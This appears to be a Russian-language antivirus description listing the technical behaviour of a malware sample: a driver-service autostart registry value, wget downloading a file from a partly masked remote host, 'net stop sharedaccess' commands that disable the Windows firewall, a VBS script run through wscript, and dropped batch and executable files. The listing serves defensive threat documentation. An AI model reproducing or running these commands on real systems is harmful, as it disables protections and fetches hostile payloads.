Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\SVKP] 'Start' = '00000002'
- <Текущая директория>\wget.exe http://www.45##.com/vip/login.txt
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\net.exe stop sharedaccess
- <SYSTEM32>\wscript.exe "<Текущая директория>\up.vbs"
- <Текущая директория>\Update.bat
- <Текущая директория>\wget.exe
- <Текущая директория>\login.txt
- <Текущая директория>\up.vbs
- <SYSTEM32>\SVKP.sys
- <Текущая директория>\GameLogin.bat
- <Текущая директория>\GameLogin.exe
- <Текущая директория>\wget.exe
- <Текущая директория>\up.vbs
- <Текущая директория>\GameLogin.bat
- 'www.45##.com':80
- www.45##.com/vip/login.txt
- DNS ASK www.45##.com
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'EDIT' WindowName: ''